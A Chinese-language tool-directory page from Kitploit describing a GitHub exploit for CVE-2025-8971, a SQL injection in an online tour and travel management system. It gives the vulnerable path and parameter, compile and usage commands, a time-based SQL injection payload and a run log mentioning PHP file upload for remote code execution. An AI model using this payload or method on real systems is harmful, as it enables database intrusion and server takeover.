Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/bytereaper77/cve-2025-8971
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Archived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

在其源码的在线旅游与旅行管理系统 1.0 中的 SQL 注入漏洞。

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8971 (SQL注入)

作者:Byte Reaper

描述:

此漏洞利用程序针对 CVE-2025-8971,这是 itsourcecode Online Tour and Travel Management System 1.0 中的一个 SQL 注入漏洞。 该漏洞存在于 /admin/operations/travellers.php 中,可通过 val-username 参数远程利用。

工作原理

漏洞利用程序向目标 URL 发送精心构造的 HTTP POST 请求。

有效载荷经过编码后注入到 val-username 中。

可选的文件上传(.php 或图片)可用于实现远程代码执行。

脚本会验证响应以检查有效载荷是否成功执行。

要求:

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

编译:

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

用法:

root@kitploit:~
    -h, --help            帮助信息
    -u, --url             目标 URL(基础 URL)
    -c, --cookies         文件 cookies
    -i, --ip              伪造 IP(Host 请求)
    -f, --file            文件上传(.php / 图片)
    -v, --verbose         详细模式

运行示例:

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

许可证:

MIT 许可证

下载工具